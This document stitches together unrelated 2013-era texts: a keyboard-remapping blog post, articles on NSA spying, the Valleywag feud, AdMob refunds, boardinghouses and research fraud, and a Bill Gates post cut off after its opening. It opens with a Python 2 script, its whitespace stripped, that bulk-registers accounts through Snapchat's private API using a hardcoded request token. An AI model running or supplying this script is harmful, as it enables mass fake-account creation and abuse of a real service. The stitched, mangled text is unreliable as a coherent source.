#!/usr/bin/env python2# python2 bulk_register.py < accounts.txt > registered.txt# format accounts.txt like `username:password:email`importrequestsimportsysaccounts=[a.split(":")forainsys.stdin.read().split("\n")ifa.strip()!=""]base="https://feelinsonice.appspot.com"foraccountinaccounts:username,password,email=accountreg=requests.post(base+"/bq/register",data={"req_token":"9301c956749167186ee713e4f3a3d90446e84d8d19a4ca8ea9b4b314d1c51b7b","timestamp":1373209025,"email":email,"password":password,"age":19,"birthday":"1994-11-27",},headers={"User-agent":None})ifnotreg.json()["logged"]:continuenam=requests.post(base+"/ph/registeru",data={"req_token":"9301c956749167186ee713e4f3a3d90446e84d8d19a4ca8ea9b4b314d1c51b7b","timestamp":1373209025,"email":email,"username":username},headers={"User-agent":None})ifnotnam.json()["logged"]:continuesys.stdout.write(":".join(account)+"\n")sys.stdout.flush()

I’ve had my Caps Lock key remapped to an escape key for some time now. I’ve become quite used to it — to the point where using other people’s keyboards is inconvenient. Given that I’ve already ruined my muscle memory, I figured I’d take it a step further. The end result is that hitting my Caps Lock key once still gives me “Escape,” but holding it triggers a “Hyper” modifier key (simultaneous Control, Shift, Option and Command). I can map the Hyper key using any of an assortment of utilities to do all kinds of fun things.

This is a slightly simplified version of what Steve Losh presented earlier this year, specifically the remapping that takes place in the Hyper section of that post. The idea is the same, but this doesn’t modify the behavior of the Control key; my muscle memory just wasn’t ready to accept that.

The first thing you’ll need to do is disable the Caps Lock key in OS X. Head to System Preferences’ Keyboard pane and click the “Modifier Keys…” button. Set Caps Lock to “No Action.”

The system starts with PCKeyboardHack. I’ve used this on all of my machines, including Mountain Lion systems and have never had issues because of it. It installs a kernel extension, but I swear it’s nothing to be afraid of.

Once you install PCKeyboardHack, all you need to do is set your Caps Lock key to key code 80 (F19):

Next, I used KeyRemap4MacBook, another kext utility for more intensive remapping. If you’re new to KeyRemap4MacBook, you’ll have fun (and likely be overwhelmed) sifting through the default options. Explore, but be warned that enabling too many at once will guarantee that you forget which keys do what and lead to unexpected behavior. I know this from experience.

I’m adding my own custom commands to KeyRemap using the private.xml file. This file is easily located by opening KeyRemap4MacBook, going to the Misc. tab and clicking the button to “Open private.xml.”

Below is the code that I’m using for the primary remapping. It sets up the F19 key that the Caps Lock key is now remapped to so that pressing it once triggers escape (especially handy in vim) and holding it down simulates holding Control, Command, Option and Shift all at once. Rarely is this combination used as a hotkey combo, so it becomes a key that can be mapped to system-wide functions that are easily accessible without conflicting with anything else.

Save the file and go back to KeyRemap4MacBook’s settings. Under the “Change Key” tab, hit the “ReloadXML” button on the right and your new options will show up at the top of the list (the screenshot shows some of my extra mappings, if your private.xml file is brand new you’ll only see the “F19 to F19” option). Enable “F19 to F19” and you’re good to go with a brand new Hyper key.

To make use of the Hyper key, you’ll want to start mapping it using your favorite keyboard utility. I’m doing most of my mapping in BetterTouchTool, but a tool like Keyboard Maestro offers even more options for sequential actions and other conditions.

Here are some basic settings I’m using to launch apps with the Hyper key. Hyper-M opens Mail, Hyper-B opens Chrome (browser), Hyper-T opens my iTerm2 visor, etc.

You can also modify your DefaultKeyBindings file to add editing commands triggered by the Hyper key when in Cocoa text fields, or special mappings in an app like iTerm2 to perform command-line text navigation. Sky’s pretty much the limit.

By now, we've heard from tech companies such as Facebook, Google and Cisco Systems that the National Security Agency's spying poses a threat to their international business and, in Cisco's case, is already hurting it. So what does that threat look like, exactly, at ground level?

Some companies are apparently so concerned about the NSA snooping on their data that they're requiring - in writing - that their technology suppliers store their data outside the U.S.

In Canada, a pharmaceutical company and government agency have now both added language to that effect to their contracts with suppliers, as did a grocery chain in the U.K., according to J.J. Thompson, chief executive officer of Rook Consulting, an Indianapolis, Indiana-based security-consulting firm. He declined to name the companies, which are using Rook to manage the segmentation and keep the data out of the U.S.

Thompson said the language began appearing in contracts over the past couple weeks, and could be an early indicator of things to come as businesses adapt to a landscape altered by former NSA contractor Edward Snowden's leaks. Documents leaked by Snowden indicate that the NSA has tapped fiber-optic cables abroad, circumvented or cracked encryption and is massively collecting telephone records and Internet traffic. Facebook, Google, Apple and Yahoo were among 15 technology companies that asked President Barack Obama Dec. 17 to restrain the spy programs. Cisco said Nov. 13 that NSA spying has caused delays to networking equipment orders.

U.S.-based technology companies face a serious threat. The NSA disclosures may reduce U.S. technology sales overseas by as much as $180 billion, or 25 percent of information technology services, by 2016, according to Forrester Research Inc., a group in Cambridge, Massachusetts.

Some large tech firms have used the revelations as a public relations opportunity, casting themselves as defenders of individual privacy and a bulwark against government encroachment. The approach has elicited accusations of hypocrisy from privacy advocates who say that many tech companies are eroding privacy, as we reported Monday.

It's not all doom and gloom, however. Thompson's comments show that some U.S. firms stand to benefit from distrust of the U.S. government, and that a new model may be in the offing for protecting sensitive data from the NSA's prying eyes.

There's a worry in this approach, though. Keeping the data out of the U.S. makes intuitive sense, and limits the likelihood that U.S. firms bound by U.S. laws will disclose it to the government. However, if the scandal has proven nothing else, it's that the NSA isn't bound by geography. And bucking the childhood admonishment, it certainly doesn't do the polite thing and always ask permission first either.

By Paul Carr
On December 26, 2013

Last Friday morning, a shuttle bus transporting Google workers from Oakland to Mountain View was surrounded by a mob. A banner was unfurled – “Fuck off Google” — and several of the protesters began hurling rocks at the bus, smashing a side window. Later reports suggested the bus had its tires slashed before police arrived to break up the violence.

The attack coincided with a similar protest in San Francisco, which remained peaceful, although afterwards Erin Mcelroy of Eviction-Free San Francisco told Pando she was “excited” that her Oakland colleagues were “mobilizing in different ways.”

And so this is what it’s come to.

The technology industry in San Francisco continues to grow, and its highly paid workers continue to force up housing rents, pricing out local blue collar workers. Then there’s the Ellis Act which, critics say, makes it easier for landlords to force out long-time tenants with almost no oversight (defenders of the act argue that, in most cases, homeowners have to financially compensate evicted tenants). What’s not in doubt is that multi-billion-dollar companies like Twitter are being offered tax breaks to remain in San Francisco, while many regular folks can’t afford to stay even if they want to.

Setting aside the irony that, without those tax breaks, companies like Twitter had threatened to move out of San Francisco to nearby cities like Oakland, it’s not hard to understand why many workers in the Bay Area are angry at Larry Page, Sergey Brin, Marissa Mayer, Jack Dorsey and any of the other tech billionaires who have caused average one bedroom rents in San Francisco to rise close to $3000, and are likely to cause similar price hikes in Oakland.

And yet. Larry Page doesn’t take a shuttle bus to work, nor does Jack Dorsey. We can tell ourselves that the senior software engineer at Google earning $149,224 or the Facebook user operations analyst on $43,518 is infinitely more privileged than the BART driver taking home $155,308 or the station janitor who gets $82,752— and certainly most Googlers wouldn’t swap places with even their higher paid blue collar colleagues. But the fact remains that the people on that Google bus — the dozen or so junior employees and one terrified bus driver — played absolutely no part in creating the policies that have caused so much anger. One group of workers, scaring the shit out of another group of workers achieves almost nothing except turning public opinion against the protesters, like pissing in the lobby of a Bank of America succeeds only in ruining a janitor’s morning and giving the cops an excuse to sling you in jail.

Telling self-defeating protesters to stop making the same mistakes that self-defeating protesters have made for generations is not my game here — not least because I can’t imagine that anyone throwing a rock at a Google bus reads Pando, edited as it is by a free market monster, and staffed by such anti-labor zealots as… David Sirota and Mark Ames.

Also, the vast majority of the protesters seem sincere in their violent anger. Misguided, perhaps, but sincere. God knows it’s refreshing to see the blunt rage of a “Fuck Off Google” banner or the naked violence of a thrown rock in this maddeningly ironic, nod-and-a-snarky-wink world. Put a bird on this, you hipster fuck.

All of it which makes it twice as disgusting to see a putrid, but highly visible subset of the technology press trying to co-opt the sincere anger of Bay Area workers and spin it into disingenuous, smug faux-classbaiting horseshit, for pageviews and cash bonuses.

CENTCOM for this fake-class-war-by-drone is Nick Denton’s Valleywag gossip blog which, despite its name, is safely situated in Manhattan, thousands of miles from the battlefront. Having regenerated more times than Doctor Who (but without the likable main character or crisp writing), the current incarnation of Valleywag has one clear mission: to grab hundreds of millions of monetizable clicks through an endless barrage of outraged posts about the entitled jerks who work in the technology industry.

This all-new Valleywag was conceived during the Occupy protests, when Gawker’s editors discovered that stories about a class war were just catnip for pageviews. And most of the Wall Streeters were mere millionaires— just imagine how much Gawker’s hipster readers would hate billionaires. Or billionaire nerds!

By the end of 2012, Occupy stories had all but fizzled out. So, in January of 2013, Denton announced — via Wall Street trade blog, Business Insider— the imminent return of Valleywag. The relaunched site came out swinging, with posts taking aim at the genuinely rich and powerful in Silicon Valley — skewering Marissa Mayer for buying her child an expensive playhouse and Sean Parker whose wedding was responsible for killing wildlife and protected trees in a Big Sur forest (never mind that it was later revealed that Mayer bought the house at an auction, for a $33,000 donation to a local charity which restores old homes for families in need, and that Parker didn’t, er, actually kill any wildlife or protected trees).

But something was off. Valleywag’s editor Sam Biddle was following his boss’ orders to the letter — but the stories weren’t sticking. No one was taking to the streets to demand Mayer’s or Parker’s head. It was as if Gawker readers didn’t care that Sheryl Sandberg once had a meeting with Jennifer Lawrence.

In fact, the usually infallible Denton had misjudged his audience. Specifically, he had forgotten the  rule that we humans aren’t easily angered by those infinitely richer or more successful than us — the super wealthy have lives so remote from our own that we can’t muster genuine jealousy for something we could never have. No, what really drives us viscerally nuts are those who are just a bit wealthier, a fraction more successful. Those fuckers who are living the lives that we could be living, were we willing to lie just a little, or cheat just a little.

And so, Biddle was given new marching orders: go after the tech workers, not their bosses.

Today a Valleywag search for, let’s say, eBay founder Pierre Omidyar, garners precisely one result: a post which says almost nothing about the eBay founder’s wealth or what he’s spending it on. Contrast that with the eight results for the word “cafeteria,” reflecting Valleywag’s current obsession with the subsidized lunches supplied to “coddled” tech workers, or the 25 results for “asshole” an epithet that Biddle has applied to a programmer who offered to teach a homeless man to code, and a seven year old child who washes cars for pocket money.

Writing at Slate, Farhad Manjoo explains the current rules of the Valleywag game:

Speaking of facts: While presenting itself as the champion of the working classes, the fact is Denton’s Gawker empire is guilty of almost every crime it accuses the tech industry of committing, and several it doesn’t. Denton, who now encourages others to sneer at Silicon Valley’s elite social clubs, made his own millions as co-founder of “First Tuesday,” an elite social club which spanned Europe during the first dot com boom. While crying foul at the off-shore tax dodging of San Francisco tech companies, Gawker Media is registered in the Cayman Islands to avoid paying US taxes, an arrangement which the New Yorker described as “like an international money-laundering operation.” As Valleywag howls that “Google interns earn more than you,” Gawker Media is currently the subject of a class action lawsuit over its earlier refusal to pay its own interns a dime for their labour. And how about Valleywag’s mockery of lavish Silicon Valley workplaces? Why not ask Denton about that when you visit his “steampunk” office, featuring “a lounge area that looks like it’s straight out of the blue pill/red pill scene in The Matrix,” an “office surfboard” and a rooftop party deck? Business Insider claims it’s one of the 15 coolest offices in tech. And while you’re there, make sure to also ask him about Gawker’s “Privilege Tournament,” a smug little contest in which Gawker readers were invited to vote on which “underprivileged” group (choices include: black, blind, transgender, people with AIDS, the homeless, “overeducated,” and fat…)  should “win” by virtue of its “sweet, sweet moral superiority” — or as Salon’s Katrina Richardson called the tournament: “a shamefully racist, sexist, homophobic and classist attempt to silence large swaths of people.”

Even Denton’s choice of Valleywag editor reeks of hypocrisy. Which is to say, if you’re going to wage a fake class war, then, Sam Faulkner Biddle is the perfect fake class warrior for the job. Long before he got his gig wailing about “spoiled brat” tech founders who owe their success to their fathers, Biddle gained entry to the prestigious Johns Hopkins university with no help whatsoever from his own father, the Pulitzer prize winning journalist — and Johns Hopkins lecturer — Wayne Biddle. In case the nepotism wasn’t obnoxious enough for his classmates, Biddle promptly joined the Delta Phi fraternity at which, Wikipedia tells us…

One of Biddle’s former classmates put it in simpler terms: Delta Phi is a club you could only join if you have rich parents. After college, Biddle moved to New York where, fancying himself a novelist— (“I gingerly unpack the same three books I’ve been carrying along with me each day and lay them down at carefully calculated angles so that their titles will be visible to those at the table. Every afternoon I create this same still life, a diorama of the aspiring writer at work…”) — he wrote a series called “Diary of an Unemployed Class of ’10 Philosophy Major in New York City” for the Awl, including this revealing paragraph…

Naaaaaah.

Finally Biddle made it to Gawker Media, where, before finding his groove as the guy who calls out the tech industry’s obsession with expensive toys and its condescension towards minimum wage workers, he wrote about $2500 record turntables for Gizmodo and was recorded patronizing two “booth babes” while lip-syncing to “Niggaz in Paris” at grotesque industry junket, CES. (Disclosure: the only time I have ever met Biddle was at CES, at a lavish dinner hosted by a tech PR agency at Mario Batali’s Carne Vino steakhouse where a rib-eye steak costs $144— or thirteen times the San Francisco minimum wage, plus tax and gratuities.)

And so it came to pass that wealthy, privileged, Sam Biddle became Nick Denton’s pick to lead Gawker’s phony, hypocritical, long-distance class war against San Francisco’s wealthy, privileged tech workers. And why not? Per David Sirota’s recent exposé of Ed Schultz, Nick and Sam wouldn’t be the first journalists to deny their privileged background in order to make bank as born-again class warriors.

Today, Biddle spends his days searching the social media accounts of junior startup employees, looking for any Tweet, blog post or YouTube video that might fit his narrative of arrogant rich kids gone wild. And with an estimated 250,000 tech workers in the bay area alone, it’s easy for him to find one each day who is monstrously, entitledly struggling to transport a Christmas tree, or twelve techies packed into a “luxury” shared house, or a guy with a car that Biddle hopes will soon be vandalised.  Or at least it should be easy.

One recent post was prompted by a Twitter employee commenting on the quality of restaurants surrounding the company’s Market Street office. To most readers, the Tweet was innocuous enough, but Biddle tortured and twisted it so disingenuously (into a narrative about how outsiders weren’t welcome at Twitter) that he was attacked in the comments by none other than former Valleywag editor Owen Thomas.

“You’re completely misreading the tweet,” wrote Thomas. “You may well still find the tweet obnoxious, but please evaluate it for its actual meaning, not some overworked misconstruing of it.” Biddle did not respond to his former colleague.

Even when Biddle is “right,” he can’t catch a break. Late last Friday afternoon, Valleywag “broke” yet another “story” — which is to say, posted yet another tweet— about a tech worker behaving badly. This time, the monster in question was IAC PR flack Justine Sacco who Tweeted to her 200 followers: “Going to Africa. Hope I don’t get AIDS. Just kidding. I’m white.” You likely know what happened next: the Tweet was picked up by BuzzFeed and Sacco washounded across the globe like a modern day Dr Crippen, until the mob finally tracked her down in South Africa. But despite his success in having Sacco threatened with rape and murder, Biddle wasn’t satisfied…

“Can’t believe the entire internet is talking about something I found and my post only has 30k clicks smh,” he Tweeted.

At least the recent anti-gentrification protests have been traffic gold for Valleywag which gleefully posted a video from the first protest, apparently showing a Google worker yelling at protesters: “You can’t afford it? You can leave. I’m sorry, get a better job.” Lest his readers be forced to form their own opinion, Biddle helpfully categorized the post as “assholes.” That did the trick…

“If anyone is begging for some mob-style retribution it’s this piece of shit,” wrote one commenter.

“Who is this ass? Name, address, background, etc …. Someone please Dox this entitled jerk,” demanded another.

“It would have been better if someone would have hit him in the face,” said a third.

Of course that story too was promptly revealed as a hoax. The Google employee was actually a union organizer posing as a tech worker in a piece of “improv political theater.” Rather than apologizing for the error, Biddle simply struck through the first two lines of the posted and added a four word update: “This was probably staged.” The rest of the post remained, as did the violent comments, alongside the growing number of responses demanding to know why Gawker didn’t delete the entire post.

The answer: Gawker writers are paid bonuses for attracting large numbers of unique visitors to the site, and its community platform — and the only thing that drives more responses than an accurate story is an inaccurate one. No wonder Biddle was “smh” at Buzzfeed stealing his traffic, and his cash reward, over the Sacco post.

Still, while Valleywag’s hypocrisy is certainly rank, for a while it wasn’t clear whether it was actually dangerous. Last week, though, we saw the first flash of violence in the bay area class war when a real bus, filled with real tech workers was hit by a real rock, showering real glass shards onto real flesh.

Even if we can’t blame Valleywag directly for the attack, the escalation might have been a good time for Biddle, were he to possess an ounce of human decency, to stop and think about whether his rhetoric might be contributing to a narrative in which ordinary tech workers, not their bosses, are the legitimate targets of violent protest.

But Biddle is not so much a normal human being as a grotesque hypocrite, employed by a huge, even more grotesquely hypocritical, media corporation. A corporation which thinks nothing of posting photographs of Trayvon Martin’s corpse on its front page and whose most senior editor believes media ethics to be “part of a process of trying to exclude the hoi polloi from the process of reporting.”

And so, despite being in possession of a metric ton more smug, entitled privilege than every man, woman and nerd on the Google bus, Sam Faulkner Biddle once again perched in his steampunk SoHo office and puked out another post mocking the members of the “coddled, gurgling startup scene” for their “pronounced horror” when an “anti-Google protest turns slightly violent.”

“There was a time when shocking people in positions of apparently unimpeachable power and influence to attain some political goal was considered “disruption,” but that was long, long ago,” Biddle wrote.

Yes, the “unimpeachable power” of an entry-level tech worker whose crime is paying inflated rent on an apartment in Oakland and whose just punishment is the “slight violence” of hurled rocks and broken glass.

Hopefully next time the mob will turn really violent and one of these tech assholes will actually be killed. Just think of the traffic surge when that happens, just think how great that Googler’s corpse will look on the front page of Gawker. You can be sure Nick Denton already is.

[Illustration by Hallie Bateman for Pandodaily]

Google Admob were completely un-contactable for the whole Xmas period and Google Wallet (I called them 3 times for over 2 hrs) were nothing short of rude and completely useless.

How Admob had the ability to debit accounts more then credit accounts (even for a 24hr period) needs to be investigated.

What company decides to process refunds (globally) three days before Christmas???. Was there a smart reason that benefited Google for this timing that perhaps backfired on them?

If Admob had a call centre I could have contacted on the 22nd and got some answers from, all would be ok, but going through Christmas not having a clue what was happening has infuriated me, cost me time, money, missed payments and I still have no idea what refund I am due.

Lets be clear on this, Google did not email anyone with the exact amount of their refund due?

I look forward to my bank managing this from this point forward as I have done everything I can to contact AdMob, Google Wallet were useless and my bank has agreed to investigate the charges when I ask them on the 22nd.

I believe Google Admob will try and keep this issue very quiet but once all old Admob customers get back from holidays and realises whats been going on with their credit card, debit card and paypal accounts, expect an uproar from these customers.

Big Fail AdMob, suggest you get a helpline set up for Jan 2nd and allow us to access a person for once seeing as you have managed to pull off one of the biggest errors I have ever seen an ad network commit in the last 10 yrs.

Below is the latest update from Google.

Announcements

24 December 2013: Legacy AdMob refund FAQ
What happened?
We are in the process of shutting down the original legacy AdMob as we move to the new AdMob platform version. As a part of this process we are working to refund unused balances on the original platform.

Why do I see 'Google*AdMob' billing activity on my current credit card statement?
Between 19 and 20 December, Google issued refunds to your AdMob account for more than your unused account balance.

To correct this error, we will be reversing these incorrect refunds with corresponding transactions for the same amount.

There may be some accounts that have many instances of 'Google*AdMob.' We apologize for any inconvenience this may cause.

Is there anything I need to do?
No. We are working to correct errors and will be refunding the correct amount in January.

When will the correct refund arrive?
The correct refund will show up on your credit card statement in January or February depending on your account billing cycle.

Late in the 1860s novel “Little Women,” heroine Jo March, dreading her friend Laurie’s budding romantic feelings for her, tells her mother she feels “restless and anxious to be seeing, doing and learning more than I am.” Her solution is to move to the city, to live and work in a boardinghouse. There, she has a room to herself, time to write, and the welcome distraction of friendships with her fellow boarders.

Today the notion of the boardinghouse—a “big house full of strangers,” as Jo writes in a letter home, where a variety of people would rent rooms and eat at a common table—seems at best quaint, and at worst unsafe and unsavory, as 19th-century critics had it. In the grand narrative of American home life—farm, small town, suburb, apartment—the boardinghouse feels like a long-vanished footnote.

In places like Boston, however, they were anything but minor: They were a key part of how 19th-century cities grew, and left an imprint that survives even now. Whole neighborhoods teemed with them. Boardinghouses for black, Irish, Jewish, and immigrant Bostonians filled the lower slopes of Beacon Hill, while even genteel landladies on fashionable Beacon Street advertised “rooms with a private family.” As American cities turned into true modern metropolises in the 1830s, boarding became a way of life; social historians estimate that between a third and half of 19th-century urban resident were either boarders themselves, or took boarders into their homes. As Walt Whitman, who lived in boardinghouses from his early teens until after the Civil War, declared in 1842: “Married men and single men, old men and pretty girls; milliners and masons; cobblers, colonels, and counter-jumpers; tailors and teachers; lieutenants, loafers, ladies, lackbrains, and lawyers; printers and parsons—‘black spirits and white, blue spirits and gay’—all ‘go out to board.’ ”

By the 1930s, traditional boardinghouses dwindled, and cities today—filled with apartments, condos, and tightly packed houses—have all but forgotten their boardinghouse heritage. But boardinghouses are now being rediscovered by a handful of historians who make the case that the institution was crucial to shaping American cities and culture, and in doing so had a lasting influence on the way we live.

They also may offer some insights into where we’re going. As Americans flock back into cities, Boston and other urban centers are seeing the development of new and denser housing. Some “micro-apartment” developments echo boardinghouses closely, with small private quarters and common areas in which residents can eat and socialize together. That’s prompting some observers to wonder if something bigger might change as well. As America’s earlier romance with boardinghouses showed, the way we live together can actually change our culture in unanticipated ways.

***

Jo March’s journey in “Little Women,” though idealized, wasn’t an unrealistic one for a woman in the 19th century. After landing at the boardinghouse, Jo earns money caring for the landlady’s boisterous young children, embarks on “riotous” adventures on Saturdays, and enjoys observing her neighbors, including a large Irish family and a friendly German professor she goes on to marry.

In the 1830s and 1840s, American cities were expanding upward and outward. Young people and immigrants flocked there for work, but most couldn’t afford to live in single-family homes; those who could saw the influx of poorer workers and began to decamp to more stylish neighborhoods. In Boston, for example, as wealthy residents left the South End, the neighborhood’s elegant townhouses were converted into boardinghouses, a pattern replicated in many cities.

Adam Simpson for The Boston Globe

Today, the perpetual urban dilemma of how to live well in cramped, expensive neighborhoods is answered mostly by apartments, each effectively its own miniature house, complete with kitchen, bathroom, bedroom, and living room. In the 19th century, the answer was to share. A boardinghouse proprietor provided housekeeping services and three meals a day, usually eaten at a common table. Boardinghouses “served people who really [couldn’t] get a foothold in urban space any other way,” explained Betsy Klimasmith, an English professor at the University of Massachusetts Boston and author of a 2005 book about urban domesticity in American literature.

As such, boardinghouses were a kaleidoscopic reflection of urban America in all its variety. In an 1857 book, “The Physiology of New York Boarding-Houses,” re-issued by Rutgers University Press in 2008, an English humorist named Thomas Butler Gunn described houses for vegetarians, actors, and Bostonians, not to mention “the boarding-house where you’re expected to make love to the landlady.” Some houses catered to respectable middle-class families, while others welcomed rowdy single sailors. An 1869 guidebook to New York City described boardinghouses that ranged from $2.50 to $40 a week.

For a population accustomed to living with extended family, boardinghouses represented a first step toward the radical autonomy that we now take for granted in modern urban life. University of Rhode Island English professor David Faflik calls this a “national rite of passage,” as a population en masse split with the ties formed in towns and countryside. Rather than break completely with these ties, however, they re-created them, in a way that will be familiar to anyone who’s seen a roommate comedy like “Friends.” Historian Wendy Gamber cites one 1850s Boston woman who called her fellow boarders her “family,” joining them for holiday celebrations and excursions to church and public lectures—an intimacy not hard to imagine for single urban people today, but boldly independent for the time.

With new freedoms came new anxieties. Most boarders were men, but many boardinghouses were coed; proprietors were responsible for maintaining a moral atmosphere, with varied levels of success. Many respectable women sought out coed houses because all-female boardinghouses were considered likely to be brothels, though charitable organizations like the YWCA opened heavily supervised women’s boardinghouses as the century progressed.

Gamber, a historian at Indiana University Bloomington, wrote the first book dedicated to boardinghouses as a general phenomenon in 2007. In her accessible “The Boardinghouse in Nineteenth-Century America,” she argues that in a century obsessed with the idealized home, boardinghouses represented a potent contrast: “If homes were private, boardinghouses were public,” she writes. “If homes nurtured virtue, boardinghouses bred vice.” As one mid-19th-century New York critic sniffed, “It may be safely affirmed that there are not ten boarding houses in the city, which do not contain improper characters.”

Gamber also observes that boardinghouses seemed an affront to convention because landladies made money by performing domestic tasks—cooking, washing bed linens, and so on—that women were “supposed” to perform for love. Female residents, particularly married women, were also suspect, having handed over their “natural” domestic duties to another woman. One early 20th-century moralist warned that boarding wives were having abortions because it would be too inconvenient to have children in a boardinghouse; others simply fretted that boarding bred lazy wives.

The sense of threat is crystallized in an 1846 novel by Sarah Josepha Hale, influential editor of the popular Godey’s Lady’s Book. In the cautionary “Boarding Out,” Hale, herself a longtime boardinghouse resident, depicts a headstrong Boston wife who insists on moving her family from their own comfortable house to avoid becoming a “mere drudge.” The family auctions off its furniture and moves to a fashionable boardinghouse, where the mother grows vain and the father idle, and their young daughter Fanny takes ill and dies. The child’s last words are, “I want to go home.”

Adam Simpson for The Boston Globe

***

As histrionic as their warnings may sound today, 19th-century hand-wringers were right to worry that boardinghouses threatened the status quo. Boarding not only saved money and time, but to writers or others who craved exposure to a world beyond small towns, they provided an opportunity for social mixing, privacy, storytelling, and intimacy with strangers. Nathaniel Hawthorne, Herman Melville, Henry David Thoreau, Ralph Waldo Emerson, Emily Dickinson, and Edgar Allan Poe all lived occasionally as boarders.

A new book by David Faflik, “Boarding Out” (Northwestern University Press), argues that boardinghouses fundamentally reshaped the consciousness of the 19th century, particularly as seen through literature. Borrowing his title from Hale’s alarmist novel, he argues that the literary genre he calls “boardinghouse letters” is characterized by a sense of speed and scarcity he finds in works as varied as the ostensibly pastoral “Walden” and Nathaniel Hawthorne’s utopian novel “Blithedale Romance.” In many of these works, narrators alternate, story lines speed ahead and then cut off, and characters come and go in a style Faflik compares to a revolving door.

“Many of the works we would not associate with boardinghouses or even the city itself are very much based or founded on these changed ways of seeing the world that derive from boarding,” he said. “We wouldn’t have had an American Renaissance without cities, and we wouldn’t have had cities without boardinghouses.”

By the turn of the 20th century, boardinghouses were in decline, in favor of suburban homes, made practical by improving public transportation, and apartments, with their modern sheen of independence. Faflik calls antebellum boarding “a kind of adolescent stage for Americans as they adapted to a modern urban condition.” In the decades after the Civil War, people moved on to lodging houses, which lacked boarding’s shared meals and common spaces, as well as tenement houses, apartment hotels, and apartments as we recognize them today. “Boarders have simply ceased to be boarders,” a New York Times writer declared, somewhat prematurely, in 1878. “They have decided to live more wholesomely and satisfactorily.”

The boardinghouse spirit still survives, however. Cooperative housing, in which residents band together to maintain facilities (and respectability), carries echoes of it. Single-room occupancy buildings offer rooms with a shared kitchen. Halfway houses for recovering drug addicts and formerly homeless people often offer boardinghouse-style independent quarters and shared meals. The YMCA, whose American iteration was founded in Boston to provide boarding services to “young strangers” new to the city, and the YWCA live on, providing transitional housing and meals to the needy. College students living in dormitories and eating together in a cafeteria get a taste of the social spark boardinghouses offered; for travelers, bed and breakfasts offer a genteel, temporary version.

Some newer innovations, too, are capturing boardinghouses’ allure, offering a way to save money, escape the constraints of home, and find something like a family in the middle of a city.
Micro-apartments, extra-tiny private spaces with shared kitchens down the hall, are taking off in cities including Boston, New York, and Seattle. The website Airbnb connects people with extra space to strangers who need a place to stay. In this innovative moment, it’s not hard to imagine a 21st-century revival of more traditional boardinghouses, too. “While boarders’ complaints were numerous, they often formed long-lasting bonds with their housemates,” Gamber wrote in an e-mail. “I’m not sure how practical or affordable running a boardinghouse or living as a boarder would be...but I suspect that enterprising entrepreneurs would find a ready market.”

One variation has seen young Americans boarding with the most patient landlords of all: their parents. The recent recession pushed a quarter of American young adult “boomerang kids” back into living at home. As the economy slowly recovers, however, independent young workers are beginning to move back out on their own, bringing with them all the demands that made 19th-century boardinghouses so practical. Today’s Jo March may be sleeping in her parents’ basement, dreaming of a room for herself in the city.

Kevin Kelleher suggested an interesting way to compare programming languages: to describe each in terms of the problem it fixes. The surprising thing is how many, and how well, languages can be described this way.

Algol: Assembly language is too low-level.

Pascal: Algol doesn't have enough data types.

Modula: Pascal is too wimpy for systems programming.

Simula: Algol isn't good enough at simulations.

Smalltalk: Not everything in Simula is an object.

Fortran: Assembly language is too low-level.

Cobol: Fortran is scary.

PL/1: Fortran doesn't have enough data types.

Ada: Every existing language is missing something.

Basic: Fortran is scary.

APL: Fortran isn't good enough at manipulating arrays.

J: APL requires its own character set.

C: Assemby language is too low-level.

C++: C is too low-level.

Java: C++ is a kludge. And Microsoft is going to crush us.

C#: Java is controlled by Sun.

Lisp: Turing Machines are an awkward way to describe computation.

Scheme: MacLisp is a kludge.

T: Scheme has no libraries.

Common Lisp: There are too many dialects of Lisp.

Dylan: Scheme has no libraries, and Lisp syntax is scary.

Perl: Shell scripts/awk/sed are not enough like programming languages.

Python: Perl is a kludge.

Ruby: Perl is a kludge, and Lisp syntax is scary.

Prolog: Programming is not enough like logic.

An Iowa State University professor resigned after admitting he falsely claimed rabbit blood could be turned into a vaccine for the AIDS virus.

Dr. Dong-Pyou Han spiked a clinical test sample with healthy human blood to make it appear that the rabbit serum produced disease-fighting antibodies, officials said.

The bogus findings helped Han’s team obtain $19 million in research grants from the National Institutes of Health, said James Bradac, who oversees the institutes’ AIDS research.

The remarkable findings were reported in scientific journals but raised suspicions when other researchers could not duplicate Han’s results.

The NIH uncovered the scam when it checked the rabbit serum at a lab and found the human antibodies.

Han resigned from his university post as an assistant professor of biomedical studies  in October. His case came to light this week when it was reported in the Federal Register.

Han agreed last month not to seek government contracts for three years, the register said.

For so long, K–12 education has focused on the basic humanities and sciences. That usually meant that core subjects were English, history, math and a laboratory science of some kind. Computer science, if it was offered, was usually an elective class in middle or high school, often focused on acclimating kids to using software rather than creating their own.

But Chicago is poised to bump up computer science into the core curriculum, according to a report from the Chicago Sun-Times.

The race to get kids coding is heating up around the country. Startups and innovators are creating robots to make coding more kid-friendly, and organizations like Codeacademy have encouraged kids to set up after-school coding clubs.

CompTIA, the nonprofit association for the IT industry, weighed in on Chicago’s initiative and applauded the school district for forging ahead with the digital future.

“Early identification of students who have a real aptitude for computers and technology is a key factor in educating these kids on the many career opportunities available to them later in life,” said Todd Thibodeaux, president and chief executive officer of CompTIA, in an official statement.

“More importantly, technical literacy is a prerequisite for virtually every occupation in today's information economy, even beyond technology positions,” Thibodeaux continued. “We applaud the Chicago Public schools for taking this important step. By expanding access to technology in the classroom, students will be better prepared and more eager to pursue advanced degrees and professional certifications and embark on careers that offer good pay and opportunities for advancement and growth.”

Some Chicago teachers openly applauded the move:

And teachers outside the Chicago area are already wishing their school districts would follow in Chitown’s footsteps:

Which raises a good question: Is Chicago ahead of the curve or is it overly aggressive to introduce kindergartners to computer programming?

December 23, 2013 | By Bill Gates

You’re probably seeing a lot of people’s year-end lists right now, going through the best movies, books, YouTube clips, grumpy cat memes, etc.

I thought I would share a different kind of list: some of the good news you might have missed. I’ve limited my list to global health and development, where Melinda and I spend a lot of time, but even so, there’s a lot to report. If you measure progress by the number of children who die of preventable causes, or by the number of people who escape extreme poverty—as I do—then 2013 was definitely a good year.

For example:

